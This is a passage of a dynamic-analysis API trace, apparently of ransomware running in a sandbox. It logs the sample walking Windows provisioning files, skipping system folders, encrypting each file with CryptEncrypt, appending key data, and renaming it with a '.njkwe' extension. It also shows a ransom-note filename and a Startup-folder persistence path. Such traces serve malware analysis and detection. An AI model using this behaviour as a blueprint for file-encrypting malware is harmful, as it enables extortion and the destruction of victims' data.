(lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\152__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.900] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\152__Connections_Cellular_Vodafone.de (Germany)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\152__connections_cellular_vodafone.de (germany)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.901] GetTickCount () returned 0x11538fe [0076.901] GetTickCount () returned 0x11538fe [0076.901] GetTickCount () returned 0x11538fe [0076.901] GetTickCount () returned 0x11538fe [0076.901] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.901] GetProcessHeap () returned 0xbe0000 [0076.901] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.901] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d4, lpOverlapped=0x0) returned 1 [0076.903] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.903] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d4, lpOverlapped=0x0) returned 1 [0076.903] GetProcessHeap () returned 0xbe0000 [0076.903] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.903] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.903] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.903] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.903] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.903] CloseHandle (hObject=0x43c) returned 1 [0076.903] GetProcessHeap () returned 0xbe0000 [0076.903] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.903] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\152__Connections_Cellular_Vodafone.de (Germany)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 185 [0076.903] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\152__Connections_Cellular_Vodafone.de (Germany)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\152__connections_cellular_vodafone.de (germany)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\152__Connections_Cellular_Vodafone.de (Germany)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\152__connections_cellular_vodafone.de (germany)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.904] GetProcessHeap () returned 0xbe0000 [0076.904] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.904] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90601b92, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90601b92, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90601b92, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="153__Connections_Cellular_Vodafone.de (Germany)_i1$(__MVID)@WAP.provxml", cAlternateFileName="153__C~1.PRO")) returned 1 [0076.904] lstrcmpiW (lpString1="153__Connections_Cellular_Vodafone.de (Germany)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.904] lstrcmpiW (lpString1="153__Connections_Cellular_Vodafone.de (Germany)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.904] lstrcmpiW (lpString1="153__Connections_Cellular_Vodafone.de (Germany)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.904] lstrcmpiW (lpString1="153__Connections_Cellular_Vodafone.de (Germany)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.904] lstrcmpiW (lpString1="153__Connections_Cellular_Vodafone.de (Germany)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.904] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\153__Connections_Cellular_Vodafone.de (Germany)_i1$(__MVID)@WAP.provxml") returned 165 [0076.904] StrStrIW (lpFirst="153__Connections_Cellular_Vodafone.de (Germany)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.904] lstrcmpW (lpString1="153__Connections_Cellular_Vodafone.de (Germany)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.904] lstrcmpW (lpString1="153__Connections_Cellular_Vodafone.de (Germany)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.904] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\153__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.904] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\153__Connections_Cellular_Vodafone.de (Germany)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\153__connections_cellular_vodafone.de (germany)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.905] GetTickCount () returned 0x11538fe [0076.905] GetTickCount () returned 0x11538fe [0076.905] GetTickCount () returned 0x11538fe [0076.905] GetTickCount () returned 0x11538fe [0076.905] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.957] GetProcessHeap () returned 0xbe0000 [0076.957] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.957] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d8, lpOverlapped=0x0) returned 1 [0076.959] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.959] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d8, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d8, lpOverlapped=0x0) returned 1 [0076.959] GetProcessHeap () returned 0xbe0000 [0076.959] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.959] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.959] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.959] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.959] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.960] CloseHandle (hObject=0x43c) returned 1 [0076.960] GetProcessHeap () returned 0xbe0000 [0076.960] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.960] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\153__Connections_Cellular_Vodafone.de (Germany)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 185 [0076.960] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\153__Connections_Cellular_Vodafone.de (Germany)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\153__connections_cellular_vodafone.de (germany)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\153__Connections_Cellular_Vodafone.de (Germany)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\153__connections_cellular_vodafone.de (germany)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.961] GetProcessHeap () returned 0xbe0000 [0076.961] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.961] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90601b92, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90601b92, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90601b92, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1e0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="154__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="154__C~1.PRO")) returned 1 [0076.961] lstrcmpiW (lpString1="154__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0076.961] lstrcmpiW (lpString1="154__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0076.961] lstrcmpiW (lpString1="154__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0076.961] lstrcmpiW (lpString1="154__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0076.961] lstrcmpiW (lpString1="154__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0076.961] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\154__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0076.961] StrStrIW (lpFirst="154__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0076.961] lstrcmpW (lpString1="154__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.961] lstrcmpW (lpString1="154__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0076.961] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\154__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.961] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\154__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\154__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.961] GetTickCount () returned 0x115393d [0076.961] GetTickCount () returned 0x115393d [0076.961] GetTickCount () returned 0x115393d [0076.961] GetTickCount () returned 0x115393d [0076.962] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.962] GetProcessHeap () returned 0xbe0000 [0076.962] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.962] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0076.977] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.977] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0076.978] GetProcessHeap () returned 0xbe0000 [0076.978] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.978] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.978] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.979] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.979] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.979] CloseHandle (hObject=0x43c) returned 1 [0076.979] GetProcessHeap () returned 0xbe0000 [0076.979] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.979] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\154__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0076.979] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\154__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\154__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\154__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\154__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.980] GetProcessHeap () returned 0xbe0000 [0076.980] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.980] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90601b92, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90601b92, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90601b92, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cb, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="155__Connections_Cellular_Vodafone Ghana (Ghana)_i0$(__MVID)@WAP.provxml", cAlternateFileName="155__C~1.PRO")) returned 1 [0076.980] lstrcmpiW (lpString1="155__Connections_Cellular_Vodafone Ghana (Ghana)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.980] lstrcmpiW (lpString1="155__Connections_Cellular_Vodafone Ghana (Ghana)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.980] lstrcmpiW (lpString1="155__Connections_Cellular_Vodafone Ghana (Ghana)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.980] lstrcmpiW (lpString1="155__Connections_Cellular_Vodafone Ghana (Ghana)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.980] lstrcmpiW (lpString1="155__Connections_Cellular_Vodafone Ghana (Ghana)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.980] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\155__Connections_Cellular_Vodafone Ghana (Ghana)_i0$(__MVID)@WAP.provxml") returned 166 [0076.980] StrStrIW (lpFirst="155__Connections_Cellular_Vodafone Ghana (Ghana)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.980] lstrcmpW (lpString1="155__Connections_Cellular_Vodafone Ghana (Ghana)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.980] lstrcmpW (lpString1="155__Connections_Cellular_Vodafone Ghana (Ghana)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.980] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\155__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.980] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\155__Connections_Cellular_Vodafone Ghana (Ghana)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\155__connections_cellular_vodafone ghana (ghana)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.981] GetTickCount () returned 0x115394c [0076.981] GetTickCount () returned 0x115394c [0076.981] GetTickCount () returned 0x115394c [0076.981] GetTickCount () returned 0x115394c [0076.981] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.981] GetProcessHeap () returned 0xbe0000 [0076.981] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.981] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2cb, lpOverlapped=0x0) returned 1 [0076.983] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd35, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.983] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2cb, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2cb, lpOverlapped=0x0) returned 1 [0076.983] GetProcessHeap () returned 0xbe0000 [0076.983] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.983] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.983] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.983] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.984] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.984] CloseHandle (hObject=0x43c) returned 1 [0076.984] GetProcessHeap () returned 0xbe0000 [0076.984] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.984] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\155__Connections_Cellular_Vodafone Ghana (Ghana)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 186 [0076.984] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\155__Connections_Cellular_Vodafone Ghana (Ghana)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\155__connections_cellular_vodafone ghana (ghana)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\155__Connections_Cellular_Vodafone Ghana (Ghana)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\155__connections_cellular_vodafone ghana (ghana)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.984] GetProcessHeap () returned 0xbe0000 [0076.984] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.984] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90601b92, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90601b92, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90601b92, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1e0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="156__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="156__C~1.PRO")) returned 1 [0076.984] lstrcmpiW (lpString1="156__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0076.984] lstrcmpiW (lpString1="156__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0076.985] lstrcmpiW (lpString1="156__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", 